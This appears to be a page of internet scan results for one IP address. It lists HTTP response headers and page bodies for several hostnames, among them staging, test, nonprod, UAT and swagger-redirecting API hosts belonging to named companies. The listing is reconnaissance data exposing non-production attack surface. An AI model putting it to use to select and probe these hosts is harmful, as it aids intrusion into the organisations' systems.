<!-- End Google Tag Manager --><link rel="alternate" type="application/rss+xml" title="Axi » Feed" href="https://pages.connectforedge.net/feed/" />
<link rel="alternate" type="application/rss+xml" title="Axi » Comments Feed" href="https://pages.connectforedge.net/comments/feed/" />
<script>
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/pages.connectforedge.net\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1.9"}};
/*! This file is auto-generated */
!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode,e=(p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0),i.toDataURL());return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(p&&p.fillText)switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([129777,127995,8205,129778,127999],[129777,127995,8203,129778,127999])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(e=t.source||{}).concatemoji?c(e.concatemoji):e.wpemoji&&e.twemoji&&(c(e.twemoji),c(e.wpemoji)))}(window,document,window._wpemojiSettings);
</script>
<link rel='stylesheet' id='elementor-post-95-css' href='https://pages.connectforedge.net/wp-content/cache/autoptimize/css/autoptimize_single_65d1424c7ef91c723172c1f8a2426213.css?ver=1750226879' media='all' />
<link rel='stylesh
Open service 23.50.131.142:443 · shop-beta-api.gls-italy.com
2025-12-21 06:55
HTTP/1.1 302 Moved Temporarily Strict-Transport-Security: max-age=31536000; includeSubDomains Content-Length: 0 Location: /swagger X-Frame-Options: SAMEORIGIN X-XSS-Protection: 0; mode=block X-Content-Type-Options: nosniff Expires: Sun, 21 Dec 2025 06:55:04 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 21 Dec 2025 06:55:04 GMT Connection: close Server-Timing: cdn-cache; desc=MISS Server-Timing: edge; dur=61 Server-Timing: origin; dur=23 Server-Timing: ak_p; desc="1766300104661_389224202_1693386752_8391_5201_149_166_-";dur=1
Open service 23.50.131.142:443 · www.diyabet.com
2025-12-21 06:44
HTTP/1.1 200 OK expect-ct: enforce, max-age=21600 referrer-policy: no-referrer-when-downgrade x-original-request-host: www.diyabet.com x-vhost: diyabet.com x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block Content-Type: text/html;charset=utf-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31557600 X-Served-By: cache-fra-etou8220123-FRA X-Timer: S1766299492.078711,VS0,VS0,VE17 X-Akamai-Transformed: 9 20932 0 pmb=mRUM,3 Expires: Sun, 21 Dec 2025 06:44:52 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 21 Dec 2025 06:44:52 GMT Transfer-Encoding: chunked Connection: close Connection: Transfer-Encoding Set-Cookie: affinity="ea8d48cac9e23aa8"; Path=/; HttpOnly; secure Server-Timing: cdn-cache; desc=MISS Server-Timing: edge; dur=167 Server-Timing: origin; dur=19 Akamai-Cache-Status: NotCacheable from child Server-Timing: ak_p; desc="1766299491901_389224196_868273729_18645_1023_0_12_-";dur=1
Open service 23.50.131.142:443 · www-nonprod-exo.rubattel-weyermann.ch
2025-12-21 04:28
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 upgrade-insecure-requests: 1 x-xss-protection: 1; mode=block Link: <https://www-nonprod-exo.rubattel-weyermann.ch/wp-json/>; rel="https://api.w.org/", <https://www-nonprod-exo.rubattel-weyermann.ch/wp-json/wp/v2/pages/8>; rel="alternate"; title="JSON"; type="application/json", <https://www-nonprod-exo.rubattel-weyermann.ch/>; rel=shortlink x-panthera-cache-bypassed: 1 x-frame-options: SAMEORIGIN x-content-type-options: nosniff referrer-policy: same-origin X-Akamai-Transformed: 9 15473 0 pmb=mRUM,2 Expires: Sun, 21 Dec 2025 04:28:31 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 21 Dec 2025 04:28:31 GMT Transfer-Encoding: chunked Connection: close Connection: Transfer-Encoding Set-Cookie: PANTHERASID=9173c689e412d28d; path=/; HttpOnly; Secure Server-Timing: cdn-cache; desc=MISS Server-Timing: edge; dur=659 Server-Timing: origin; dur=412 Alt-Svc: h3=":443"; ma=93600 Strict-Transport-Security: max-age=31536000 ; includeSubDomains ; preload Server-Timing: ak_p; desc="1766291309897_389224206_510784552_106906_16817_0_188_-";dur=1
Open service 23.50.131.142:443 · www.iso.fr
2025-12-20 21:10
HTTP/1.1 200 OK
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 2547
Cache-Control: no-cache, no-store, must-revalidate
Expires: 0
Expires: Sat, 20 Dec 2025 21:10:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Dec 2025 21:10:16 GMT
Connection: close
Server-Timing: cdn-cache; desc=HIT
Server-Timing: edge; dur=1
Alt-Svc: h3=":443"; ma=93600
Strict-Transport-Security: max-age=86400 ; includeSubDomains
Set-Cookie: ak_bmsc=BD071B69FEC2558B75A40D54B986F861~000000000000000000000000000000~YAAQDhczF6uQizebAQAA71GZPR6eKX0yDqgdwcQBfQvGYNGSEMh8ufdEWEDvPQUf1oTst11NcPzCEh2aKrHbn5eqmrX8w2k+8gdqPPZFbusEDPQ88hqCxMGUnv+2Kt5gUnQ1wMt0znLjgS15QvsH+nSwFdy9ltMDaMi916fwdid56iQPxHduc632Por3ytIpn2EE/Wb9T/M767/qfI6+m039P+A2Er/ZPeAYQFXpC6iUaleme70kOWY4U3MaYYhyBDhISVwq4sUkmGSmg9eME2TOZTB4YFwl2jWLoF2MyRRTUfB2VCjyTjaNzFHL+ElMSxQUw1MxDMuZFrGF4IdC8NdjTUCdnmXFYiuf93CEnDQVmnkyrWiyoLFRUUNOkKkppeOEVGU8XN6B+H3MISkZHr8D/Ck=; Domain=.www.iso.fr; Path=/; Expires=Sat, 20 Dec 2025 23:10:16 GMT; Max-Age=7200; HttpOnly
Server-Timing: ak_p; desc="1766265016809_389224206_486960413_12_5986_0_0_-";dur=1
Page title:
<!DOCTYPE html><html><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta http-equiv="refresh" content="5; URL='/?bm-verify=AAQAAAAM______2xXkwTziuTyhESd5cOhkiIUlP1VIa8NVUQR5exxNHZfl5YDXufmm0Qq1DYWDnbT_ueakQ9_ENRWPyL2uvQzitN2vVizLX0m_R8t4tO_ygjBUlSGfYGWbWT1ZzNngKvwS6bJHMUxqUucXG_BSwwRLl-PtvGGzvfbfDMw6JOIVaOsZSx_BDb-zCjlLvAFqVIvKHyC9zWllWaLFqid0njx0Tpnl9ZCrGBGQog'" /><title> </title><script> var i = 1766265016; var j = i + Number("4218" + "24953"); </script> </head> <noscript> <iframe style="border: none; height: 100%; width: 100%;" src=""></iframe></noscript><body style="margin:0; height:100vh; display:flex; justify-content:center; align-items:flex-start;"> <div style="position:relative; top:33vh; text-align:center;"> <div> <p style="font-family:sans-serif; font-size:16px; margin-bottom:12px; color:#333;"> Powered and protected by </p> </div> <div> <img id="akam-logo" src="/_sec/akamai-logo.svg" alt="Powered by Akamai" loading="eager" style="width:200px; height:auto;" /> </div> <div class="akamai-privacy" ><a href="https://www.akamai.com/privacy" target="_blank">Privacy</a> </div> </div> <script> function triggerInterstitialChallenge() {var xhr = new XMLHttpRequest(); xhr.withCredentials = true; xhr.addEventListener("loadend", function() { try { var data = JSON.parse(xhr.responseText); if (data.hasOwnProperty('reload')) { if (data["reload"] == true) { window.location.replace(window.location.href.replace(/[&?]bm-verify=[^#]*/, "")); if(window.location.hash){ window.location.reload(); } } } else if (data.hasOwnProperty('location')) { window.location.replace(data["location"]); } else { window.location.reload(); } } catch (e) { window.location.reload(); }}); xhr.open("POST", "/_sec/verify?provider=interstitial", false); xhr.setRequestHeader("Content-Type", "application/json"); xhr.send(JSON.stringify({"bm-verify": "AAQAAAAM/////8hE3aii3yxjudMQWYElmIetMSUXeODQb8zHWDU/DrihkCSJqdaUzqodgyWuhYrX6jnjKmPdWban4adxOj2L6lOPSxLnJC9TbrHFZZEyI+gtqwN3kl5y+vY9VyvRURtMlymDJIfyLcCJP2Fb3dq+qJkOSwWISRd+Jufh2oDkEsahZ308gbjXGUVQEVgRmQRop7EtiSHmORdtQlVpsz8KF7D2Jo9d0IvuSrRr5Zp915MMqf4Pt5UdI9EGMg==", "pow": j}));} try {if (document.getElementById("akam-logo")) {document.getElementById("akam-logo").onload = function () {requestAnimationFrame(triggerInterstitialChallenge);}; document.getElementById("akam-logo").onerror = triggerInterstitialChallenge;} else {triggerInterstitialChallenge()}} catch(e) {triggerInterstitialChallenge();}</script> </body> </html>
Open service 23.50.131.142:443 · graph-b.staging.nu.nl
2025-12-20 20:25
HTTP/1.1 404 Not Found Content-Length: 0 Expires: Sat, 20 Dec 2025 20:25:17 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 20 Dec 2025 20:25:17 GMT Connection: close
Open service 23.50.131.142:443 · uat-backend-app.generalicentrallife.com
2025-12-20 10:56
HTTP/1.1 503 Service Unavailable Mime-Version: 1.0 Content-Type: text/html Content-Length: 280 Expires: Sat, 20 Dec 2025 10:56:22 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 20 Dec 2025 10:56:22 GMT Connection: close Server-Timing: edge; dur=419 Server-Timing: origin; dur=187 Server-Timing: cdn-cache; desc=MISS Alt-Svc: h3=":443"; ma=93600 Strict-Transport-Security: max-age=31536000 ; includeSubDomains Akamai-Cache-Status: NotCacheable from child Akamai-GRN: 0.1a173317.1766228181.32bd01ba Server-Timing: ak_p; desc="1766228181634_389224218_851247546_60448_5226_106_109_-";dur=1 Page title: Error <HTML><HEAD><TITLE>Error</TITLE></HEAD><BODY> An error occurred while processing your request.<p> Reference #30.1a173317.1766228181.32bd01ba <P>https://errors.edgesuite.net/30.1a173317.1766228181.32bd01ba</P> </BODY></HTML>
Open service 23.50.131.142:443 · graph-b.test.nu.nl
2025-12-20 10:16
HTTP/1.1 404 Not Found Content-Length: 0 Expires: Sat, 20 Dec 2025 10:17:00 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 20 Dec 2025 10:17:00 GMT Connection: close
Open service 23.50.131.142:443 · www.algerie.stagingirb.bnpparibas
2025-12-20 08:52
HTTP/1.1 200 OK
Last-Modified: Wed, 06 Dec 2023 10:38:27 GMT
Content-Type: text/html
x-varnish-cache: HIT
Date: Sat, 20 Dec 2025 08:52:27 GMT
Content-Length: 10701
Connection: close
Strict-Transport-Security: max-age=15768000
Page title: Apache2 Debian Default Page: It works
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Apache2 Debian Default Page: It works</title>
<style type="text/css" media="screen">
* {
margin: 0px 0px 0px 0px;
padding: 0px 0px 0px 0px;
}
body, html {
padding: 3px 3px 3px 3px;
background-color: #D8DBE2;
font-family: Verdana, sans-serif;
font-size: 11pt;
text-align: center;
}
div.main_page {
position: relative;
display: table;
width: 800px;
margin-bottom: 3px;
margin-left: auto;
margin-right: auto;
padding: 0px 0px 0px 0px;
border-width: 2px;
border-color: #212738;
border-style: solid;
background-color: #FFFFFF;
text-align: center;
}
div.page_header {
height: 99px;
width: 100%;
background-color: #F5F6F7;
}
div.page_header span {
margin: 15px 0px 0px 50px;
font-size: 180%;
font-weight: bold;
}
div.page_header img {
margin: 3px 0px 0px 40px;
border: 0px 0px 0px;
}
div.table_of_contents {
clear: left;
min-width: 200px;
margin: 3px 3px 3px 3px;
background-color: #FFFFFF;
text-align: left;
}
div.table_of_contents_item {
clear: left;
width: 100%;
margin: 4px 0px 0px 0px;
background-color: #FFFFFF;
color: #000000;
text-align: left;
}
div.table_of_contents_item a {
margin: 6px 0px 0px 6px;
}
div.content_section {
margin: 3px 3px 3px 3px;
background-color: #FFFFFF;
text-align: left;
}
div.content_section_text {
padding: 4px 8px 4px 8px;
color: #000000;
font-size: 100%;
}
div.content_section_text pre {
margin: 8px 0px 8px 0px;
padding: 8px 8px 8px 8px;
border-width: 1px;
border-style: dotted;
border-color: #000000;
background-color: #F5F6F7;
font-style: italic;
}
div.content_section_text p {
margin-bottom: 6px;
}
div.content_section_text ul, div.content_section_text li {
padding: 4px 8px 4px 16px;
}
div.section_header {
padding: 3px 6px 3px 6px;
background-color: #8E9CB2;
color: #FFFFFF;
font-weight: bold;
font-size: 112%;
text-align: center;
}
div.section_header_red {
background-color: #CD214F;
}
div.section_header_grey {
background-color: #9F9386;
}
.floating_element {
position: relative;
float: left;
}
div.table_of_contents_item a,
div.content_section_text a {
text-decoration: none;
font-weight: bold;
}
div.table_of_contents_item a:link,
div.table_of_contents_item a:visited,
div.table_of_contents_item a:active {
color: #000000;
}
div.table_of_contents_item a:hover {
background-color: #000000;
color: #FFFFFF;
}
div.content_section_text a:link,
div.content_section_text a:visited,
div.content_section_text a:active {
background-color: #DCDFE6;
color: #000000;
}
div.content_section_text a:hover {
background-color: #000000;
color: #DCDFE6;
}
div.validator {
}
</style>
</head>
<body>
<div class="main_page">
<div class="page_header floating_element">
<img src="/icons/openlogo-75.png" alt="Debian Logo" class="floating_element"/>
<span class="floating_element">
Apache2 Debian Default Page
</span>
</div>
<!-- <div class="table_of_contents floating_element">
<div class="section_header section_header_grey">
TABLE OF CONTENTS
</div>
<div class="table_of_contents_item floating_element">
<a href="#about">About</a>
</div>
<div class="table_of_contents_item floating_element">
<a href="#changes">Changes</a>
</div>
<div class="table_of_contents_item floating_element">
<a href="#scope">Scope</a>
</div>
<div class="table_of_contents_item floating_element">
<a hr
Open service 23.50.131.142:443 · graph-b.test.nu.nl
2025-12-19 10:54
HTTP/1.1 404 Not Found Content-Length: 0 Expires: Fri, 19 Dec 2025 10:54:01 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 19 Dec 2025 10:54:01 GMT Connection: close
Open service 23.50.131.142:443 · www.diyabet.com
2025-12-19 08:28
HTTP/1.1 200 OK expect-ct: enforce, max-age=21600 referrer-policy: no-referrer-when-downgrade x-original-request-host: www.diyabet.com x-vhost: diyabet.com x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block Content-Type: text/html;charset=utf-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31557600 X-Served-By: cache-fra-etou8220029-FRA X-Timer: S1766132889.294095,VS0,VS0,VE17 X-Akamai-Transformed: 9 20932 0 pmb=mRUM,3 Expires: Fri, 19 Dec 2025 08:28:09 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 19 Dec 2025 08:28:09 GMT Transfer-Encoding: chunked Connection: close Connection: Transfer-Encoding Set-Cookie: affinity="1be6ffd593778ff4"; Path=/; HttpOnly; secure Server-Timing: cdn-cache; desc=MISS Server-Timing: edge; dur=6 Server-Timing: origin; dur=19 Akamai-Cache-Status: NotCacheable from child Server-Timing: ak_p; desc="1766132889123_389224206_136873646_2444_907_82_166_-";dur=1
Open service 23.50.131.142:443 · www-nonprod-exo.rubattel-weyermann.ch
2025-12-19 01:51
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 upgrade-insecure-requests: 1 x-xss-protection: 1; mode=block Link: <https://www-nonprod-exo.rubattel-weyermann.ch/wp-json/>; rel="https://api.w.org/", <https://www-nonprod-exo.rubattel-weyermann.ch/wp-json/wp/v2/pages/8>; rel="alternate"; title="JSON"; type="application/json", <https://www-nonprod-exo.rubattel-weyermann.ch/>; rel=shortlink x-panthera-cache-bypassed: 1 x-frame-options: SAMEORIGIN x-content-type-options: nosniff referrer-policy: same-origin X-Akamai-Transformed: 9 15472 0 pmb=mRUM,2 Expires: Fri, 19 Dec 2025 01:51:45 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 19 Dec 2025 01:51:45 GMT Transfer-Encoding: chunked Connection: close Connection: Transfer-Encoding Set-Cookie: PANTHERASID=9173c689e412d28d; path=/; HttpOnly; Secure Server-Timing: cdn-cache; desc=MISS Server-Timing: edge; dur=981 Server-Timing: origin; dur=448 Alt-Svc: h3=":443"; ma=93600 Strict-Transport-Security: max-age=31536000 ; includeSubDomains ; preload Server-Timing: ak_p; desc="1766109104083_389224208_625693311_142557_5732_0_2_-";dur=1
Open service 23.50.131.142:443 · shop-beta-api.gls-italy.com
2025-12-19 01:34
HTTP/1.1 302 Moved Temporarily Strict-Transport-Security: max-age=31536000; includeSubDomains Content-Length: 0 Location: /swagger X-Frame-Options: SAMEORIGIN X-XSS-Protection: 0; mode=block X-Content-Type-Options: nosniff Expires: Fri, 19 Dec 2025 01:34:05 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 19 Dec 2025 01:34:05 GMT Connection: close Set-Cookie: dtCookieufy76sk1=v_4_srv_4_sn_1C46BAB9B30CB5B3B0C745D78A3E6A41_perc_100000_ol_0_mul_1_app-3Aea7c4b59f27d43eb_1_rcs-3Acss_0; Path=/; Domain=.gls-italy.com Server-Timing: cdn-cache; desc=MISS Server-Timing: edge; dur=8 Server-Timing: origin; dur=9 Server-Timing: dtSInfo;desc="0", dtRpid;desc="2139964541" Server-Timing: ak_p; desc="1766108045413_389224202_822619559_1756_3849_81_83_-";dur=1